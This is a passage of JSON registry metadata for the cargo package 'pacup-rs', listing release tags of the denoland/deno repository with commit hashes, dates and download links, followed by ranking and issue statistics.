6:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:46:29.836Z","dependent_packages_count":0,"downloads":540,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.77300844001724,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.039405075007102074,"forks_count":0.09805448897116098,"average":30.608212750749157},"purl":"pkg:cargo/pacup-rs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/pacup-rs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/pacup-rs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/pacup-rs/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"